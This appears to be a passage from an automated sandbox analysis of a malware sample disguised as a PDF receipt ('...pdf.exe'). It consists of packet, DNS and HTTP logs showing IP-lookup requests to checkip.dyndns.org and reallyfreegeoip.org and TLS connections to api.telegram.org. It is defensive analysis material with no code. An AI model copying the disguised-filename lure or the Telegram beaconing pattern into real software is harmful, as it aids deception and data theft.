                                                                                                                                                        Jan 16, 2025 07:02:10.197016954 CET4974880192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.197952986 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.198602915 CET8049751132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.199322939 CET4975180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.204045057 CET8049752132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.204252005 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.204309940 CET8049748132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.204365969 CET4974880192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.204824924 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.211018085 CET8049752132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.326970100 CET4975180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.332343102 CET8049751132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.888091087 CET8049752132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.889206886 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.889256954 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.889602900 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.889914036 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.889930964 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.897293091 CET8049751132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.898535013 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.898575068 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.898652077 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.898991108 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:10.899007082 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:10.933615923 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:10.949120045 CET4975180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.358315945 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.359736919 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.359823942 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.369323969 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.370559931 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.370588064 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.488719940 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.488867998 CET44349754104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.488975048 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.489136934 CET49754443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.491831064 CET4975180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.492609978 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.498224020 CET8049751132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.498280048 CET4975180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.500045061 CET8049755132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.500113010 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.500195980 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.505562067 CET8049755132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.507580996 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.507713079 CET44349753104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.507771969 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.507973909 CET49753443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:11.510780096 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.511758089 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.516001940 CET8049752132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.516072035 CET4975280192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.516659021 CET8049756132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:11.516716003 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.516803980 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:11.521545887 CET8049756132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.179640055 CET8049755132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.181237936 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.181333065 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.181713104 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.182051897 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.182090044 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.191920042 CET8049756132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.193244934 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.193348885 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.193444014 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.193715096 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.193753004 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.230367899 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.246016979 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.661446095 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.662971973 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.662977934 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.663062096 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.664413929 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.664450884 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.787473917 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.787626028 CET44349757104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.787691116 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.788106918 CET49757443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.791747093 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.792979956 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.796792030 CET8049755132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.797116995 CET4975580192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.797785044 CET8049759132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.797933102 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.798032999 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.799921036 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.799981117 CET44349758104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.800213099 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.800508022 CET49758443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:12.803185940 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.803819895 CET8049759132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.804184914 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.808759928 CET8049756132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.808826923 CET4975680192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.809040070 CET8049760132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:12.809210062 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.809525013 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:12.814563990 CET8049760132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.481650114 CET8049760132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.482670069 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.482718945 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.482853889 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.483042955 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.483053923 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.487201929 CET8049759132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.488471985 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.488517046 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.488595963 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.488871098 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.488888025 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.527353048 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:13.529378891 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:13.947385073 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.948879957 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.948908091 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.960921049 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:13.962305069 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:13.962383032 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088083029 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088263988 CET44349761104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088453054 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.088716984 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.088819027 CET49761443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.088860989 CET44349762104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.089163065 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.089574099 CET49762443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.094136953 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.095668077 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.100857973 CET8049759132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.101030111 CET4975980192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102296114 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.102385998 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102797031 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.102813959 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.108068943 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.108277082 CET8049760132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.108488083 CET4976080192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:14.110444069 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.110552073 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.110645056 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.111027956 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.111061096 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.757618904 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.757711887 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.759485960 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.759505033 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.760003090 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.761554003 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:14.795737982 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.797000885 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797048092 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.797151089 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797333956 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:14.797344923 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.807377100 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.839890957 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.004565954 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.004703999 CET44349764149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.004842043 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:15.010381937 CET49764443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:15.274079084 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.276901960 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.276921034 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412025928 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412158966 CET44349765104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.412209988 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.412456036 CET49765443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:15.415086985 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.416125059 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.420161009 CET8049763132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.420242071 CET4976380192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.421001911 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:15.421088934 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.421257973 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:15.426089048 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.113840103 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.114898920 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.114940882 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.115101099 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.115504026 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.115520000 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.167912960 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.603981972 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.606329918 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.606369019 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.746766090 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.746928930 CET44349769104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.749839067 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.749839067 CET49769443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:16.753272057 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.757278919 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.758295059 CET8049767132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.762058973 CET4976780192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.762128115 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:16.762437105 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.762437105 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:16.767306089 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.453342915 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.456933022 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.456980944 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.457037926 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.457273006 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.457289934 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.507591009 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:17.920289040 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:17.932430983 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:17.932470083 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071536064 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071681976 CET44349774104.21.64.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.071760893 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:18.072071075 CET49774443192.168.2.4104.21.64.1
                                                                                                                                                        Jan 16, 2025 07:02:18.081146955 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:18.081902981 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.081948996 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.083410978 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.083870888 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.083888054 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.086915016 CET8049771132.226.247.73192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.086966038 CET4977180192.168.2.4132.226.247.73
                                                                                                                                                        Jan 16, 2025 07:02:18.742834091 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.742960930 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.744899988 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.744930029 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.745321035 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:18.746867895 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:18.787365913 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008114100 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008280039 CET44349775149.154.167.220192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:19.008348942 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:19.010726929 CET49775443192.168.2.4149.154.167.220
                                                                                                                                                        Jan 16, 2025 07:02:22.682938099 CET4973780192.168.2.4132.226.247.73

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 16, 2025 07:02:02.249608994 CET5907653192.168.2.41.1.1.1
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET53590761.1.1.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:03.250842094 CET5572953192.168.2.41.1.1.1
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET53557291.1.1.1192.168.2.4
                                                                                                                                                        Jan 16, 2025 07:02:14.103185892 CET4964153192.168.2.41.1.1.1
                                                                                                                                                        Jan 16, 2025 07:02:14.109883070 CET53496411.1.1.1192.168.2.4

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Jan 16, 2025 07:02:02.249608994 CET192.168.2.41.1.1.10x7436Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.250842094 CET192.168.2.41.1.1.10xc163Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:14.103185892 CET192.168.2.41.1.1.10x9d98Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:02.256432056 CET1.1.1.1192.168.2.40x7436No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:03.257628918 CET1.1.1.1192.168.2.40xc163No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                        Jan 16, 2025 07:02:14.109883070 CET1.1.1.1192.168.2.40x9d98No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                                        • api.telegram.org
                                                                                                                                                        • checkip.dyndns.org

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449733132.226.247.73807656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 16, 2025 07:02:02.286500931 CET151OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Jan 16, 2025 07:02:02.972321987 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:02 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                        Jan 16, 2025 07:02:02.990948915 CET127OUTGET / HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                                        Jan 16, 2025 07:02:03.206130981 CET273INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:03 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 104
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Pragma: no-cache
